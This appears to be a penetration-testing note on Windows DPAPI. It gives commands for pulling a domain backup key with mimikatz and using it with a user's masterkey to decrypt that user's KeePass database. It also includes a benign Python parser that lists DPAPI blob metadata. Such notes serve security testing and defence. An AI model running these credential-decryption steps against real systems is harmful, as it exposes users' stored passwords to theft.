# DPAPI

## Tools

* tijldeneut's dpapilab-ng
* BlackDiverX's unpacked cqtools
* Use CQTools with care: `CQMasterKeyAD.exe` does not work correctly. It will drive you mad. Here is the workaround. The presupposition is that you want to decrypt a blob with a masterkey, e.g. a KeePass database that is saved with Windows logon DPAPI.
  * Get the pvk backup key from the DC via mimikatz
  * Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
  * Get the encrypted blob
  * Get the user's masterkey under `C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\`
  * Use dpapilab-ng's `keepassdec.py`:

    ```
    ./keepassdec.py --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin
    ```

  * Use the decrypted blob with:

    ```
    CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
    ```

  * Open the `*.kdbx` file
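Added example, not part of this compendium's notes and not code from dpapilab-ng or CQTools: a small Python parser that recognises DPAPI blobs by their fixed header and reports which masterkey GUID each one references. The masterkey files under `Protect\<SID>\` are named by that GUID, so this is what tells you which file the decryption step above actually depends on, and on the defensive side it lets you inventory, from a blob or a file dump, which user masterkeys a recovered backup key would have exposed. The layout walked here (version DWORD, provider GUID `df9d8cd0-1501-11d1-8c7a-00c04fc297eb`, masterkey GUID, UTF-16 description, cipher and hash ALG_IDs, salt, HMAC keys, ciphertext, signature) is the documented `CryptProtectData` blob format; the `build_sample_blob` helper, the `ALG_NAMES` table and all function names are constructed for this example and the sample blob it builds cannot be decrypted by anything.

```python
import struct
import uuid
from dataclasses import dataclass

# Provider GUID that every DPAPI blob carries right after its version DWORD.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_ID values commonly seen in DPAPI blobs (readable names only).
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}

@dataclass
class DpapiBlobHeader:
    master_key_guid: str   # names the masterkey file under Protect\<SID>\ this blob needs
    flags: int
    description: str
    alg_crypt: str
    alg_hash: str
    salt_len: int
    data_len: int
    sign_len: int
    size: int              # total bytes the blob occupies

class _Reader:  # bounds-checked little-endian cursor over a byte string
    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.buf):
            raise ValueError("truncated DPAPI blob")
        self.pos += n
        return self.buf[self.pos - n:self.pos]

    def u32(self) -> int:
        return struct.unpack("<I", self.take(4))[0]

    def guid(self) -> str:
        return str(uuid.UUID(bytes_le=self.take(16)))

    def lv(self) -> bytes:  # DWORD length, then that many bytes
        return self.take(self.u32())

def parse_dpapi_blob(data: bytes) -> DpapiBlobHeader:
    """Walk the DPAPI blob layout and return its metadata.
    Raises ValueError for anything that is not a well-formed version-1 blob."""
    r = _Reader(data)
    if r.u32() != 1:
        raise ValueError("unsupported DPAPI blob version")
    if r.guid() != str(DPAPI_PROVIDER_GUID):
        raise ValueError("not a DPAPI blob (provider GUID mismatch)")
    r.u32()                                   # dwMasterKeyVersion
    master_key_guid = r.guid()
    flags = r.u32()
    description = r.lv().decode("utf-16-le").rstrip("\x00")
    alg_crypt, _ = r.u32(), r.u32()           # algCrypt, key length in bits
    salt = r.lv()
    r.lv()                                    # pbHmacKey (legacy, normally empty)
    alg_hash, _ = r.u32(), r.u32()            # algHash, hash length in bits
    r.lv()                                    # pbHmac2Key
    ciphertext, signature = r.lv(), r.lv()
    return DpapiBlobHeader(master_key_guid, flags, description,
                           ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
                           ALG_NAMES.get(alg_hash, hex(alg_hash)),
                           len(salt), len(ciphertext), len(signature), r.pos)

def find_dpapi_blobs(data: bytes):
    """Locate every well-formed DPAPI blob embedded in an arbitrary byte string
    (config file, registry value, memory dump) via its fixed 20-byte prefix."""
    signature = struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
    found, pos = [], data.find(signature)
    while pos != -1:
        try:
            header = parse_dpapi_blob(data[pos:])
            found.append((pos, header))
            pos = data.find(signature, pos + header.size)
        except ValueError:                    # false positive or damaged blob
            pos = data.find(signature, pos + 1)
    return found

def build_sample_blob(master_key_guid: str, description: str) -> bytes:
    """Constructed test input: layout-correct, but salt, ciphertext and HMAC are
    zero filler, so no key can decrypt it. Exists only to exercise the parser."""
    def lv(b: bytes) -> bytes:
        return struct.pack("<I", len(b)) + b
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(master_key_guid).bytes_le
            + struct.pack("<I", 0) + lv((description + "\x00").encode("utf-16-le"))
            + struct.pack("<II", 0x6610, 256) + lv(bytes(32))      # AES-256, 32-byte salt
            + lv(b"") + struct.pack("<II", 0x800E, 512) + lv(b"")  # no HMAC keys, SHA-512
            + lv(bytes(48)) + lv(bytes(64)))                        # ciphertext, signature

if __name__ == "__main__":
    sample = b"<constructed>" + build_sample_blob(
        "11111111-2222-4333-8444-555555555555", "Constructed KeePass key") + b"<tail>"
    for offset, hdr in find_dpapi_blobs(sample):
        print(f"offset {offset}: masterkey {hdr.master_key_guid} "
              f"{hdr.alg_crypt}/{hdr.alg_hash} desc={hdr.description!r}")
```

Run as a script it prints the offset, masterkey GUID and algorithms of the blob embedded in the constructed sample; point `find_dpapi_blobs` at the bytes of the encrypted blob from the steps above (or at any larger file) to learn which `Protect\<SID>\<GUID>` masterkey it is bound to before touching any key material. The bounds-checked reader matters because these blobs often turn up inside untrusted or damaged dumps, and a length field that runs past the buffer should produce a clean `ValueError` rather than a silent misparse.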